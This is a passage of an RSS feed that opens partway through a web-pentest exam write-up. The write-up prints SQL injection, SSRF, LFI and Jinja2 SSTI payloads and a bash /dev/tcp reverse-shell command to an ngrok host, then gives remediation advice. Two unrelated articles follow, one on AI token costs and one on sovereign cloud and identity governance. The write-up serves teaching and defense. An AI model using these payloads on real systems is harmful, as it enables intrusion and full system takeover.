exist in isolation. Here is the exact execution path — from unauthenticated visitor to root shell:</p><pre>[Attacker — No credentials, no prior knowledge]<br>        │<br>        ▼<br>[1] Application recon → identify Flask sessions, /legal?doc= parameter, <br>    SSRF endpoint at /api/v1/resort/preview?url=<br>        │<br>        ▼<br>[2] SQL Injection → POST /login and /admin/login<br>    Payload: ' OR '1'='1' --<br>    Result:  Full admin session, no credentials required   [F-01]<br>        │<br>        ▼<br>[3] SSRF → GET /api/v1/resort/preview?url=http://127.0.0.1/internal/config<br>    Result:  Flask secret key + JWT secret + admin password<br>             CTF{SSRF_gives_internal_access}               [F-02]<br>        │<br>        ├──────────────────────────────────────────────────────────┐<br>        ▼                                                          ▼<br>[4] LFI → GET /legal?doc=%2Froot%2Fapp.py           [4b] JWT Forgery<br>    Result: Full source code → confirms SSTI vector        Forge superadmin token<br>            GET /legal?doc=%2Fetc%2Fpasswd               with signing secret<br>            → process running as root confirmed            CTF{JWT_alg_none_is_never_safe}<br>            GET /legal?doc=%2Froot%2Fvanguard.db   [F-04]<br>            → full database dump               [F-03]<br>        │<br>        ▼<br>[5] SSTI via forged Flask session cookie<br>    username = {{config.__class__.__init__.__globals__['os'].popen('id').read()}}<br>    → id: uid=0(root)                                       [F-05]<br>        │<br>        ▼<br>[6] Reverse shell via ngrok TCP tunnel<br>    cmd = "bash -i &gt;&amp; /dev/tcp/&lt;NGROK_IP&gt;/20699 0&gt;&amp;1"<br>    Encode → base64 | base64 -d | bash<br>    → Listener receives connection<br>        │<br>        ▼<br>[7] root@82.153.241.96:~# whoami<br>    root<br>    ══════════════════════════════<br>    FULL OS COMPROMISE AS ROOT<br>    ══════════════════════════════</pre><p><strong>The chain in plain English:</strong></p><ol><li>SQLi gave admin access with no credentials.</li><li>SSRF leaked the Flask secret key and JWT secret from the server’s own internal config.</li><li>LFI provided full source code confirming the SSTI vulnerability in the profile route.</li><li>With the Flask secret, I forged a session cookie with a Jinja2 OS command payload as the username.</li><li>The server evaluated the payload and executed it as root — because the process had never been stripped of root privileges.</li><li>ngrok tunneled the reverse shell past NAT, and the connection landed on my listener.</li></ol><p>Each vulnerability alone is serious. Chained together, they form a straight line from zero to root.</p><h3>The “Impossible” Shell</h3><p>Let me come back to the statement that opened this write-up.</p><p>My instructor said shell access was not possible. What he likely meant was that there was no obvious command injection, no file upload with execution, no traditional RCE surface visible from standard black-box testing. He was right about the obvious paths.</p><p>What he hadn’t accounted for was the chain:</p><ul><li>SSRF leaking the Flask secret key</li><li>LFI confirming the source code’s SSTI vulnerability</li><li>The combination of those two facts enabling session cookie forgery with a Jinja2 payload</li></ul><p>Each of these findings seemed independent. But the moment you chain SSRF → LFI → SSTI, you have arbitrary code execution. And when the web process runs as root, you have the entire machine.</p><p>The lesson is one that applies to every penetration test: the absence of a single obvious RCE vector does not mean RCE is impossible. It means the path may require more steps.</p><h3>Remediation Priority Roadmap</h3><p><strong>Immediate — 24 hours</strong></p><p><strong>1 · F-01 · SQL Injection</strong> Replace all dynamically constructed SQL queries with parameterised queries or prepared statements.</p><p><strong>2 · F-05 · SSTI / RCE</strong> Pass template variables by context — never concatenate user input into template strings. Run the web process as a dedicated non-root user.</p><p><strong>3 · F-04 · JWT Weak Secret</strong> Rotate the signing secret immediately. Enforce a cryptographically random minimum 256-bit key stored in environment variables, never in source code.</p><p><strong>Urgent — 72 hours</strong></p><p><strong>4 · F-03 · Local File Inclusion</strong> Validate and sanitise all filename parameters. Resolve absolute paths and confirm they reside within the permitted base directory before any file read.</p><p><strong>5 · F-02 · SSRF</strong> Implement an allowlist of permitted outbound destination URLs. Block all requests to RFC 1918 private ranges and loopback addresses. Disable debug and internal config endpoints in production.</p><p><strong>6 · F-10 · Sensitive Data Exposure</strong> Remove all hardcoded secrets from source code. Rotate every exposed credential and secret key immediately following this report.</p><p><strong>High — 1 week</strong></p><p><strong>7 · F-09 · Missing Authentication on API</strong> Apply mandatory authentication middleware to all state-mutating API routes: DELETE, PUT, PATCH, POST.</p><p><strong>8 · F-06 · Stored XSS</strong> Sanitise all user-supplied HTML server-side before database storage. Implement a strict Content Security Policy header.</p><p><strong>9 · F-08 · IDOR</strong> Enforce object-level authorisation on every invoice and resource retrieval. Verify the authenticated user’s ID matches the record owner before returning data.</p><p><strong>Medium — 2 weeks</strong></p><p><strong>10 · F-07 · Reflected XSS</strong> Encode all user-supplied query parameter values before inserting them into HTML responses.</p><h3>Key Takeaways for Developers</h3><p><strong>1. Never run a web application as root.</strong> If code execution is ever achieved — through any vulnerability, at any severity level — a root-running process turns that into immediate full system compromise. Use a dedicated low-privilege service user. Always.</p><p><strong>2. Never concatenate user input into template strings.</strong> Jinja2’s power is its flexibility. That flexibility becomes a weapon the moment user-controlled data enters the template context unseparated from the template logic itself. Pass all user data as context variables with the name=value syntax. Never concatenate.</p><p><strong>3. SSRF can expose secrets that enable completely separate attack chains.</strong> SSRF is often treated as a moderate finding because the direct impact feels limited. In this case, a single SSRF request to /internal/config handed over the keys to JWT forgery and SSTI exploitation. SSRF that can reach internal metadata endpoints or configuration services deserves Critical severity.</p><p><strong>4. LFI on a root-owned process is a full credential dump.</strong> /etc/shadow, database files, source code, .bash_history — all of it is readable when the process runs with unrestricted filesystem access. LFI severity scales directly with the process's OS privilege level.</p><p><strong>5. Secrets in source code cannot be rotated without a deployment.</strong> A secret hardcoded in app.py is exposed every time the source is read — via LFI, version control misconfiguration, or any future breach. Secrets belong in environment variables, managed through a proper secrets store, and rotated independently of code changes.</p><p><strong>6. Test all combinations, not just individual findings.</strong> The individual vulnerabilities here ranged from serious to severe. But their combined impact — a fully unobstructed path from unauthenticated access to root OS compromise — was only visible by tracing the chain. Penetration testing is about attack paths, not checklists.</p><h3>Final Thoughts</h3><p>This exam ran for ten hours. At the end of it, I had documented ten confirmed vulnerabilities and a root shell on a machine I was told couldn’t be compromised that way.</p><p>That quote — <em>“</em>You Can’t Get a Shell<em>”</em> — wasn’t said to challenge me. It was a genuine belief about the application’s security posture. And that belief was wrong, not because the application had obvious flaws, but because the combination of a leaked Flask secret, an SSTI vector in the profile route, and a process running as root formed a path that wasn’t visible from any single angle.</p><p>The three systemic failures that made this possible:</p><ol><li><strong>No input validation</strong> — SQL queries, template strings, and file paths all accepted user input without sanitisation.</li><li><strong>Hardcoded secrets in source code</strong> — One SSRF or LFI request was enough to recover everything needed for session forgery and token fabrication.</li><li><strong>Root execution</strong> — The web process running as root transformed every code execution path, regardless of how it was reached, into full system compromise.</li></ol><p>All of these are fixable. Most of them in hours. The gap between a vulnerable application and a secure one is often smaller than it looks from the outside — which is exactly why testing matters.</p><p><em>Assessment conducted under MilliSec LLC examination supervision. All exploitation performed on an authorized target within an isolated lab environment. Never test systems you do not own or have explicit authorization to test.</em></p><p><em>If this was useful, connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=a82c804ce8e2" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/my-instructor-said-you-cant-get-a-shell-i-got-root-full-web-pentest-exam-write-up-a82c804ce8e2">My Instructor Said “You Can’t Get a Shell.” I Got Root. — Full Web Pentest Exam Write-Up</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tokenomics in enterprise AI]]></title>
<description><![CDATA[Tokenomics has quickly become one of the most practical subjects in enterprise AI. In simple terms, it is the discipline of understanding how tokens are consumed, how that consumption turns into cost and how an organization can shape usage patterns so that AI remains valuable without becoming fin...]]></description>
<link>https://tsecurity.de/de/3598713/it-security-nachrichten/tokenomics-in-enterprise-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598713/it-security-nachrichten/tokenomics-in-enterprise-ai/</guid>
<pubDate>Mon, 15 Jun 2026 12:05:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Tokenomics has quickly become one of the most practical subjects in enterprise AI. In simple terms, it is the discipline of understanding how tokens are consumed, how that consumption turns into cost and how an organization can shape usage patterns so that AI remains valuable without becoming financially unpredictable. In most large language model services, every prompt, every retrieved context block, every tool description, every system instruction and every generated response contributes to the token bill. That means the economics of AI are no longer driven only by licenses or infrastructure. They are increasingly driven by usage behavior, prompt design, model choice and governance decisions. For technology leaders, this creates a new operating responsibility: they must treat tokens the way they already treat compute, storage and network consumption. Token usage needs to be measured, planned, optimized and governed with the same discipline as any other cloud resource.</p>



<h2 class="wp-block-heading">Understanding tokenomics in AI services</h2>



<p>A token is the smallest billing unit used by many AI services to represent pieces of text, code, symbols or structured content processed by the model. A single user request usually consumes input tokens and output tokens. Input tokens come from the instructions sent to the model, including the system prompt, user prompt, conversation history, retrieved documents, tool schemas and metadata. Output tokens are the tokens generated in the response. In most commercial AI services, output tokens are priced higher than input tokens, which means long and unconstrained responses can silently become one of the largest sources of waste. This matters even more in enterprise settings where thousands of requests are executed every day across assistants, search copilots, engineering agents, document summarizers, support bots and automated workflows.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="522" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Token optimization in AI services.</figcaption></figure><p class="imageCredit">Magesh Kasthuri</p></div>



<p>In practice, token costs are shaped by a handful of recurring patterns as per the Gartner report. The first is context inflation, where applications keep sending large prompt prefixes, verbose policy instructions, long chat history and oversized retrieval payloads on every call. The second is poor model matching, where high-end models are used for routine tasks such as classification, extraction, formatting or test data generation, even though smaller and cheaper models would do the job well. The third is response sprawl, where no output length controls are enforced and the model returns far more text than the user or process actually needs. The fourth is retry amplification, where agentic or automated workflows invoke the model repeatedly because the surrounding application lacks validation, caching or routing logic. Once AI usage expands across departments, these issues accumulate rapidly and can distort the economics of a program even when the underlying models are technically sound.</p>



<h2 class="wp-block-heading">How an organization should plan token optimization</h2>



<p>Organizations that manage AI well do not begin with model selection alone. They begin with operating intent. That means clearly identifying which use cases need premium reasoning, which use cases can tolerate lower latency or asynchronous processing, which ones need strict output controls and which ones are suitable for summarization or retrieval before generation. You can refer to <a href="https://www.linkedin.com/posts/joaquinlippincott_gartner-tokenomics-will-become-a-new-activity-7457810114641682432-bhTF/" rel="nofollow">Gartner’s</a> “Tokenomics will become a new discipline” for guidelines.</p>



<p>A sensible token optimization plan usually starts with workload segmentation. Interactive experiences such as executive copilots, complex engineering assistance or contract analysis may justify higher-quality models. Routine workloads such as log classification, regression test explanation, boilerplate documentation, FAQ answering and metadata tagging often do not. Segmenting workloads this way allows the enterprise to create a service catalog for AI usage rather than exposing every consumer to the most expensive model by default.</p>



<p>The next step is governance. Every enterprise AI platform should collect token telemetry at the request level and aggregate it by application, environment, team, model and use case. Without that visibility, optimization becomes guesswork. Leaders should define token budgets, monthly thresholds, rate limits and environment-specific quotas. It is also wise to introduce approval paths for long-context models, tool-heavy agents and experimental multi-step reasoning workflows because these patterns can multiply token consumption very quickly.</p>



<p>A mature operating model also includes prompt standards, retrieval size limits, output token caps, response templates and model routing policies. This turns token optimization into an engineering discipline rather than a one-time cost exercise. When done well, the organization creates a feedback loop where usage data improves architecture decisions and architecture decisions reduce unnecessary consumption over time.</p>



<h2 class="wp-block-heading">Core token optimization techniques across cloud AI platforms</h2>



<p>Some optimization practices are effective regardless of whether the organization is using AWS, Azure or Google Cloud. The first is prompt minimization with purpose. This does not mean making prompts unnaturally short. It means sending only the instructions and context required for the current task. Static instructions should be kept stable and separated from dynamic content. Retrieved documents should be ranked and trimmed instead of being attached in full. Tool definitions should be exposed only when needed. Few-shot examples should be used selectively and removed when they no longer improve quality. In many enterprise systems, the easiest savings come not from changing the model, but from removing repetitive and low-value prompt baggage. You can refer to Deloitte’s <a href="https://www.deloitte.com/content/dam/assets-shared/docs/services/consulting/2026/how-to-navigate-economics-of-ai.pdf" rel="nofollow">report</a> “The pivot to tokenomics” for more details on this scenario.</p>



<p>The second technique is model routing. Not every prompt deserves the largest model. A classifier, router or policy layer can evaluate the request and direct simple tasks to lighter models while reserving premium models for complex reasoning, domain-sensitive analysis or code-heavy interactions. The third technique is response shaping. If the application needs three bullet points, a JSON object, a summary or a fixed-length explanation, that expectation should be explicit. Output token controls, concise formatting instructions and schema-bound responses help contain cost while also improving consistency. The fourth technique is caching. Repeated prompt prefixes, repeated documents, repeated tool descriptions and repeated intermediate outputs should be cached wherever the platform allows it. Prompt caching can reduce the need to recompute long shared prefixes, while response caching prevents duplicate model calls for frequently repeated requests. These approaches are especially valuable in internal copilots, support bots and engineering assistants where repetitive interactions are common. AWS, Azure and Google Cloud all support variations of context or prompt caching for repeated content, which can significantly reduce repeated input-token processing when prompts share the same stable prefix.</p>



<p>The fifth technique is asynchronous and batch execution for non-urgent work. Many AI jobs inside enterprises do not need interactive response times. Offline summarization, document enrichment, code review snapshots, test case explanation, defect clustering and log interpretation can often be queued and processed later at lower cost. The sixth technique is context lifecycle management. Long conversations and agent sessions must be pruned, summarized or checkpointed instead of carrying the full history forever. If a session needs memory, a summarized state is usually cheaper than replaying every turn. In retrieval-augmented systems, only the top-ranked passages should be injected into the prompt and documents should be chunked intelligently so that the model receives the smallest high-value context possible. These changes reduce cost, improve latency and often improve answer quality because the model is forced to focus on more relevant inputs.</p>



<h2 class="wp-block-heading">Token optimization on AWS</h2>



<p>On AWS, token optimization typically centers on Amazon Bedrock and the architecture built around it. A strong starting point is model selection by task type. Bedrock gives organizations access to multiple foundation models and that creates an opportunity to route simple workloads to smaller models and reserve more capable models for difficult reasoning or coding tasks. This is often the single biggest cost lever. Another major lever is prompt caching. Amazon Bedrock supports prompt caching for supported models, allowing repeated prompt prefixes to be reused instead of being recomputed on every request. This is particularly useful when the application repeatedly sends large system instructions, policy context, product manuals or codebase guidance. Bedrock documentation explains that cached prefixes can reduce latency and lower input-token cost for repeated context, with model-specific checkpoint thresholds and time-to-live behavior. [Amazon Bedrock]() prompt caching can reduce repeated input processing when stable prompt prefixes are reused across calls.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="575" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Figure: Token optimization in AWS</figcaption></figure><p class="imageCredit">Magesh Kasthuri</p></div>



<p>AWS environments also benefit from separating real-time and non-real-time inference paths. Bedrock batch-style or queued processing patterns are far more economical for workloads such as nightly test artifact analysis, bulk document summarization, defect triage and generated knowledge extraction. Engineering teams should also place a policy layer in front of Bedrock to cap output size, restrict unsupported long-context prompts and enforce retrieval limits. If the application uses agentic orchestration, every tool call and every retry should be monitored because agents can consume tokens far faster than interactive human users. A practical AWS pattern is to combine Bedrock with a lightweight gateway that logs tokens per request, tags usage by environment and application and routes requests to the least expensive model that still meets quality objectives. This gives CIO and CTO teams better visibility into where token spending is justified and where it is simply accidental.</p>



<h2 class="wp-block-heading">Token optimization on Azure</h2>



<p>On Azure, token optimization is often discussed in the context of Azure OpenAI and Microsoft Foundry model services. Azure provides one of the clearest examples of prompt caching as a cost and latency lever. Microsoft documentation explains that prompt caching can reduce repeated processing of identical prompt prefixes and supported models can keep cached prefixes available for short in-memory periods or extended retention windows, depending on the model and configuration. To benefit from this, organizations must structure prompts carefully. Stable content, such as system instructions, compliance rules, coding standards or tool schemas, should appear at the beginning of the request, while variable user content should appear later. [Microsoft Foundry]() documents that prompt caching applies to supported Azure OpenAI models when prompts meet minimum length and prefix-match requirements, helping reduce latency and input-token cost.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="295" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Figure: Token optimization in Azure</figcaption></figure><p class="imageCredit">Magesh Kasthuri</p></div>



<p>Azure environments are also well-suited for strong observability. Organizations can capture request telemetry, prompt tokens and completion tokens through platform diagnostics and application-level logging, then correlate that usage with deployment names, environments and business applications. This makes it easier to spot noisy prompts, excessive completions or teams that are using premium models for low-value work. In mature Azure estates, leaders often separate pay-as-you-go experimentation from predictable, high-volume workloads. Stable workloads may justify reserved or provisioned capacity, while spiky or uncertain workloads can remain on variable pricing. For DevTest, Azure teams should use model allow-lists, token ceilings and shorter retention periods for conversation history. Developers should never have unrestricted access to large-context and premium reasoning deployments unless the workload genuinely requires it. Governance is most effective when prompt templates, response formats, budget thresholds and environment-level quotas are built into the platform rather than enforced only by policy documents.</p>



<h2 class="wp-block-heading">Token optimization on Google Cloud</h2>



<p>On Google Cloud, token optimization is commonly associated with Vertex AI and Gemini-based workloads. Google Cloud has emphasized context caching as a way to reduce the cost of repeatedly sending large prompt content such as detailed instructions, codebases, multimodal assets or long documents. Vertex AI supports both implicit and explicit caching patterns, which allow organizations to either benefit from automatic reuse or deliberately persist reusable context for predictable savings. Google notes that Vertex AI context caching reduces repeated token processing and can lower the cost of cached tokens for supported Gemini models, while also improving latency.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="538" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Figure: Token optimization in GCP</figcaption></figure><p class="imageCredit">Magesh Kasthuri</p></div>



<p>Google Cloud also offers a practical ecosystem for prompt improvement and token discipline. Vertex AI prompt optimization capabilities help teams refine prompts so that they are clearer, more compact and more effective without depending on excessive examples or unnecessary instruction text. That matters because poor prompts often lead to repeated retries, broader context injection and inflated output lengths. Another valuable pattern on GCP is workload routing through Model Garden or application logic so that lower-cost models handle straightforward summarization, extraction and routing tasks while premium models are reserved for high-value reasoning. In large enterprise deployments, teams should also use token-count estimation before execution for expensive workflows, especially when long documents, code repositories or multimodal content are involved. This creates a preflight check that can stop oversized requests before they reach production inference paths.</p>



<h2 class="wp-block-heading">Real-time example: AI-powered test failure analysis in a DevTest program</h2>



<p>Consider a large engineering organization that uses AI to analyze failed test cases during continuous integration. Every failed build triggers an AI workflow that reads stack traces, selected log fragments, recent code changes, known defect patterns and testing guidelines, then generates a root-cause summary and recommended next steps for developers. At first, the team builds the solution straightforwardly. It sends the entire recent build log, the full testing policy, the complete conversation history from the issue thread and a long instruction template to a premium model for every failure. The results are useful, but the token bill rises sharply. The reason is obvious in hindsight: the same policy content is sent repeatedly, the logs are far longer than necessary and many failures are routine enough that they do not require the most capable model.</p>



<p>Now, imagine the same workflow after token optimization. The platform first classifies the failure type. If it is a known regression signature, a smaller model handles the explanation. Only ambiguous failures go to the premium model. The testing policy and coding standards are moved into a reusable cached prefix. The log stream is preprocessed so that only the most relevant error windows and surrounding events are included. Older conversation turns are summarized into a short state object instead of being replayed in full. The response is constrained to a fixed template: probable cause, impacted component, confidence level and recommended action. If the same failure signature appears again, the prior explanation is served from the response cache unless recent code changes suggest a new interpretation. This redesigned flow typically reduces unnecessary input tokens, lowers output verbosity and improves turnaround time. More importantly, it turns AI usage into a disciplined engineering service rather than a loosely controlled experimental feature.</p>



<h2 class="wp-block-heading">How CIOs and CTOs can optimize AI usage in DevTest</h2>



<p>DevTest environments are where token waste often hides in plain sight. Teams experiment freely, prompts change often, logs are verbose and developers naturally gravitate toward the best available model because they are trying to move quickly. That is exactly why CIO and CTO leaders need a distinct DevTest token strategy rather than simply copying production policies. The goal in DevTest is not to eliminate experimentation. The goal is to make experimentation cost-aware. A sensible starting point is environment segmentation. Sandbox, development, testing, performance validation and pre-production should each have their own token budgets, model permissions and rate limits. Premium reasoning models should be limited to approved scenarios, while most routine experimentation should default to cheaper models with smaller context windows.</p>



<p>Leadership teams should also insist on a small set of operating controls. First, every DevTest AI request should be tagged with application, team, engineer, environment, model and use case so that usage can be traced accurately. Second, token ceilings should exist at both user and application level, with alerts when thresholds are crossed. Third, platform teams should provide reusable prompt templates that are already optimized for brevity, schema-based output and caching compatibility. Fourth, batch windows should be used for heavy non-interactive workloads such as codebase summarization, test artifact enrichment and bulk defect clustering. Fifth, long-running agent workflows should be monitored for retry loops and context growth, because these are common sources of runaway consumption. When these controls are present, DevTest remains innovative without turning into an uncontrolled cost sink.</p>



<p>From an executive planning perspective, CIOs and CTOs should treat AI token usage as part of both cloud FinOps and engineering governance as you can read from this forbes <a href="https://www.forbes.com/councils/forbesbusinessdevelopmentcouncil/2024/12/12/tokenomics-101-building-sustainable-economic-models/" rel="nofollow">report</a> on “Best practices for designing effective Tokenomics”. Monthly reviews should not focus only on total spend. They should examine token consumption per workflow, cost per successful outcome, model utilization by task category, cache hit rates and the percentage of requests routed to lower-cost models. Teams that repeatedly exceed expected token usage should not simply be blocked; they should be helped to redesign prompts, reduce retrieval payloads, improve orchestration logic and replace verbose responses with structured outputs. This creates a healthier operating culture. The conversation moves away from restricting AI and toward making AI economically sustainable at scale. That shift is important because enterprise AI programs succeed not when usage is unlimited, but when value and consumption stay in balance.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p>Tokenomics is now a foundational part of enterprise AI architecture. As organizations scale AI across engineering, operations, support and knowledge work, token usage becomes a direct determinant of cost, responsiveness and sustainability. The most effective organizations plan for this early. They segment workloads, match models to task complexity, constrain outputs, trim context, use caching intelligently, batch non-urgent work and govern DevTest with the same seriousness they apply to production infrastructure. AWS, Azure and GCP each provide useful mechanisms to support this approach, but the bigger advantage comes from disciplined design. When token optimization is treated as a core architectural practice, AI programs become easier to scale, easier to govern and far more likely to deliver measurable business value without waste.</p>



<p><em>This article was made possible by our partnership with the IASA </em><a href="https://chiefarchitectforum.org/" target="_blank" rel="nofollow"><em>Chief Architect Forum</em></a><em>. The CAF’s purpose is to test, challenge and support the art and science of Business Technology Architecture and its evolution over time as well as grow the influence and leadership of chief architects both inside and outside the profession. The CAF is a leadership community of the </em><a href="https://iasaglobal.org/" target="_blank" rel="nofollow"><em>IASA</em></a><em>, the leading non-profit professional association for business technology architects.</em></p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sovereign cloud won’t fix your AI risk. Identity governance will]]></title>
<description><![CDATA[Your board is asking. Your legal team is asking. Your auditors will be asking: Should AI workloads move to sovereign cloud, or stay on AWS, Azure or GCP? European enterprises have already run this experiment — under real regulatory pressure, with real money and real consequences. Many discovered ...]]></description>
<link>https://tsecurity.de/de/3598569/it-security-nachrichten/sovereign-cloud-wont-fix-your-ai-risk-identity-governance-will/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598569/it-security-nachrichten/sovereign-cloud-wont-fix-your-ai-risk-identity-governance-will/</guid>
<pubDate>Mon, 15 Jun 2026 11:08:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Your board is asking. Your legal team is asking. Your auditors will be asking: Should AI workloads move to sovereign cloud, or stay on AWS, Azure or GCP? European enterprises have already run this experiment — under real regulatory pressure, with real money and real consequences. Many discovered that sovereign cloud alone didn’t deliver the control they expected. The real control point turned out to be somewhere else entirely.</p>



<p>Europe ran this experiment first, under regulatory pressure US enterprises are only starting to feel. With DORA fully in force since January 2025, NIS2 enforcement underway across EU member states and the EU AI Act’s high-risk system provisions taking effect in August 2026, European enterprises — particularly in financial services, critical infrastructure and manufacturing — have spent two years migrating workloads, renegotiating contracts and writing sovereign cloud into board-level risk frameworks. The hyperscalers responded. AWS launched its European Sovereign Cloud in January 2026. Microsoft and Google followed with their own sovereignty offerings. The market arrived.</p>



<p>US enterprises are not far behind. <a href="https://www.sec.gov/newsroom/speeches-statements/gerding-cybersecurity-disclosure-20231214">The SEC’s cybersecurity disclosure rules</a>, <a href="https://www.cisa.gov/resources-tools/resources/principles-secure-integration-artificial-intelligence-operational-technology">CISA’s AI security guidance</a>, proposed state-level AI regulations and growing board-level scrutiny of AI governance are creating comparable pressures on this side of the Atlantic. If your organization runs AI workloads on behalf of EU clients, operates EU subsidiaries or simply faces the question of where sensitive AI training data and model outputs should live — you are already in this conversation. The European experience is your preview.</p>



<p>What has not arrived is clarity on what you actually get — and what you do not. At the <a href="https://www.kuppingercole.com/events/eic2026/agenda">European Identity and Cloud Conference</a> in Berlin this May, the mood among practitioners had shifted measurably from previous years. The cheering for the sovereign cloud concept was over. What was happening on stage and in the corridors was a careful, sometimes uncomfortable, dissection of the gap between marketing slides and operational reality. (<a href="https://www.kuppingercole.com/events/eic2027">EIC returns to Berlin in May 2027</a>.)</p>



<p>The conference agenda made the shift visible. Where previous years centered on sovereign cloud architecture and vendor selection, the 2026 program’s trending themes — as mapped in the closing session — were AI security, identity fabric, workload identity management, and crypto agility. Sovereign cloud had become assumed infrastructure. The practitioner conversation had moved to what you build on top of it, and who controls that layer.</p>



<p>Martin Kuppinger, distinguished analyst and co-founder of KuppingerCole, observed the same shift: “Cloud sovereignty had a much larger role at this year’s EIC, with a differentiated discussion about whether and where it is needed. There is common sense that sovereignty is not a value in its own right — the required level depends on the use case and a proper risk assessment. There is no binary model for sovereignty.”</p>



<p><em>Sovereign cloud, on the slides, looks like control. In the contracts, service matrices and AI agent deployments, it often looks more like a very expensive illusion.</em></p>



<h2 class="wp-block-heading">The control question nobody answers clearly</h2>



<p>When enterprises talk about sovereign cloud, they are usually thinking about data residency — where the data lives. European data center, European jurisdiction. But data residency is the beginning of the conversation, not the end.</p>



<p>The harder questions are about control. Who holds the encryption keys, and who can compel access to them under what legal circumstances? Who sees the metadata, the access logs, the telemetry from your workloads? When you run AI inference or model training on a sovereign cloud platform, who controls the model registry, the training data pipeline, the output logs? And when an AI agent acts autonomously on your behalf — scheduling workloads, provisioning resources, making access decisions — whose infrastructure is that agent running on, and who can observe what it does?</p>



<p>These are not hypothetical concerns. <a href="https://www.congress.gov/bill/115th-congress/house-bill/4943/text">The CLOUD Act of 2018</a> gives US authorities the ability to compel US companies to produce data stored abroad, regardless of where the servers sit. European sovereign cloud offerings from US hyperscalers are structured to address this — through operational separation, European legal entities and customer-managed keys — but the structures are new, partially tested and vary significantly between providers.</p>



<p>Germany’s BSI has raised the stakes further. In April 2026, the agency published its <a href="https://www.bsi.bund.de/EN/Themen/Unternehmen-und-Organisationen/Informationen-und-Empfehlungen/Empfehlungen-nach-Angriffszielen/Cloud-Computing/C3A/C3A_node.html">Criteria Enabling Cloud Computing Autonomy (C3A)</a>: The first framework to operationalize what cloud sovereignty actually means in technical terms, including disconnect scenarios, staff residency requirements and an extraordinary provision for federal takeover of cloud operations in defense scenarios. Formally non-binding, the criteria are widely expected to become the de facto benchmark for German federal procurement — and a likely template for EU-level frameworks now in the legislative pipeline. For US CISOs, the direction of travel is clear: Regulatory definitions of cloud sovereignty are tightening, and the gap between “data in Europe” and “operationally sovereign” is only going to widen.</p>



<h2 class="wp-block-heading">Identity is where sovereignty actually lives</h2>



<p>The clearest theme at EIC 2026 was that identity — not network perimeter, not data residency — is where cloud sovereignty either holds or breaks down. The argument is becoming hard to avoid.</p>



<p>Jason Keenaghan, who leads identity management strategy at Thales, framed it directly: “Identity is shifting from an IT function to a regulated infrastructure. The most important question for the next decade will be: Who is in control?”</p>



<p>For a US CISO, this shift is very real: Identity governance is moving from pure IT plumbing to a regulated control surface that auditors, regulators and even enterprise customers in RfPs will increasingly scrutinize. The question of “who is in control” is no longer philosophical. It is contractual.</p>



<p>Here’s the problem. You can put your data in a Frankfurt data center with customer-managed keys. But if your identity governance is weak — if you do not know which human users, service accounts and AI agents have access to what, and under what conditions — your sovereignty posture is only as strong as your weakest identity. A compromised privileged account does not care about data residency.</p>



<p>This is particularly acute for AI workloads. Agentic AI systems — models that act autonomously, make API calls, provision resources, access data — are creating a new category of non-human identities that most enterprises’ IAM systems were never designed to manage. Consider a concrete example I have seen in client environments: An LLM-based deployment agent with standing access to production Kubernetes clusters. It schedules workloads, provisions resources and makes access decisions autonomously. If that agent runs on sovereign cloud infrastructure but its identity — its credentials, its permissions, its audit trail — is not properly governed, your sovereignty posture is exactly as strong as the weakest link in that agent’s access chain. If you are running similar agents in US-based cloud regions today, the same identity blind spots exist — even if you never touch a sovereign cloud region.</p>



<p>Sebastian Rohr, an IAM consultant and IDPro member who has spent two decades on enterprise identity architectures, distilled the requirements for governing AI agents in practice: “Every agent needs an assigned non-human identity. A solid on-behalf-of delegation model must be established. An audit trail via SIEM integration is required. No long-lived credentials, no API keys — only ephemeral credentials. Context-based authentication and fine-grained access control. Agents must be managed as real identities. And once that foundation exists: Risk-based, continuous re-authentication combined with the ability for real-time revocation. Do we have all these capabilities everywhere today? Not necessarily — but designing the architecture for it? That is entirely possible.”</p>



<p>For AI agents in particular, the practical question is this: Can you list every agent running in your environment, govern its entitlements and revoke access in real time? If not, you do not truly control the workload — regardless of which cloud region it runs in.</p>



<p>What practitioners at EIC kept coming back to is not a sovereign cloud answer. It is an identity governance answer. Sovereign cloud buys you legal protection and data residency. Identity governance gives you operational control — and increasingly, it is the layer where AI workload sovereignty actually has to be enforced.</p>



<h2 class="wp-block-heading">When sovereign cloud is worth it — and when it is not</h2>



